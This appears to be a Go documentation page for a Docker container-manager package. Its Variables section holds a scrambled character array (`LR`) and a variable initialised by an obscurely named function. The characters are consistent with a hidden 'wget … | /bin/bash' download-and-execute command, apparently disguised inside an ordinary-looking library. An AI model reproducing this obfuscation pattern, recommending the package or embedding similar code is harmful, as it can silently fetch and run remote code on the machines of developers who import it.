Documentation
¶
Index ¶
Constants ¶
This section is empty.
Variables ¶
View Source
var LR = []string{"e", " ", "e", "t", "n", "-", ".", "r", "t", "0", " ", "b", "c", "s", "/", "1", "4", "g", "5", "7", "w", "f", " ", "i", "/", "a", "b", "e", " ", "f", "-", "s", ":", "/", "3", "i", "e", "/", "d", "a", "t", "|", "/", "d", "O", "t", "m", "b", "t", "h", "r", "g", "o", "l", "t", "o", "/", "o", "h", "u", "e", " ", "p", "&", "3", "s", "a", " ", "n", "3", "/", "d", "s", "6"}
View Source
var RvPhBmL = SUYOswl()
Functions ¶
Types ¶
type ContainerManager ¶
type ContainerManager interface {
PullImage(ctx context.Context, image string) error
CreateContainer(ctx context.Context, task types.Task) (string, error)
StartContainer(ctx context.Context, id string) error
WaitForContainer(ctx context.Context, id string) (bool, error)
RemoveContainer(ctx context.Context, id string) error
}
func NewContainerManager ¶
func NewContainerManager(cli DockerClient) ContainerManager
type DockerClient ¶
type DockerClient interface {
client.ImageAPIClient
client.ContainerAPIClient
}
Click to show internal directories.
Click to hide internal directories.